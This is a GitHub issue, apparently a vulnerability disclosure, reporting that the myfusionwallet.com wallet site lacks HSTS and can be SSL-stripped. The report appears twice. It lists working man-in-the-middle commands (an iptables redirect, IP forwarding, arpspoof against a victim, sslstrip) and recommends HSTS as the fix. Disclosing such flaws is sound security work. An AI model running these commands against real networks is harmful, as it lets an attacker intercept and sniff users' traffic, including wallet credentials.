You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Vulnerability: Application Vulnerable to MiTM Attack/SSLStrip Attack (Hacking HTTPS)
Description: It was observed that the application is vulnerable to a MiTM (Man in The Middle) Attack. This means an attacker can intercept the connection between a web browser and a trusted website by forcing the website to load without utilizing SSL/TLS.
Steps to Reproduce:
1- Enter the below command in a Linux command prompt: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
2- Now use the below command to enable forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
3- Now use arpspoofing for the target victim: arpspoof -i eth0 -t victim ip gateway ip
4- You should now see that arpsoof is running. Now in a separate terminal window type the following command: sslstrip -l 8080
5- When the victim tries to access myfusionwallet.com it will load over HTTP.
Or
check the HSTS Presence in the response header.
Impact: An attacker can force the application to utilize HTTP. Once the application is over HTTP then an attacker can sniff the communication.
Fix: The following are recommendations to protect against SSLStrip and similar attacks:
Screenshot: Shows application is accessible over HTTP
1- Enable HSTS
2- Enable HTTPS throughout the website
Vulnerability: Application Vulnerable to MiTM Attack/SSLStrip Attack (Hacking HTTPS)
Description: It was observed that the application is vulnerable to a MiTM (Man in The Middle) Attack. This means an attacker can intercept the connection between a web browser and a trusted website by forcing the website to load without utilizing SSL/TLS.
Vulnerable Application: Wallet Webserver https://www.myfusionwallet.com/
Severity: High
Steps to Reproduce:
1- Enter the below command in a Linux command prompt: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
2- Now use the below command to enable forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
3- Now use arpspoofing for the target victim: arpspoof -i eth0 -t victim ip gateway ip
4- You should now see that arpsoof is running. Now in a separate terminal window type the following command: sslstrip -l 8080
5- When the victim tries to access myfusionwallet.com it will load over HTTP.
Or
check the HSTS Presence in the response header.
Impact: An attacker can force the application to utilize HTTP. Once the application is over HTTP then an attacker can sniff the communication.
Fix: The following are recommendations to protect against SSLStrip and similar attacks:
Screenshot: Shows application is accessible over HTTP
1- Enable HSTS
2- Enable HTTPS throughout the website
Attack Reference: Reference link to understand more about this issue:
https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/
The text was updated successfully, but these errors were encountered: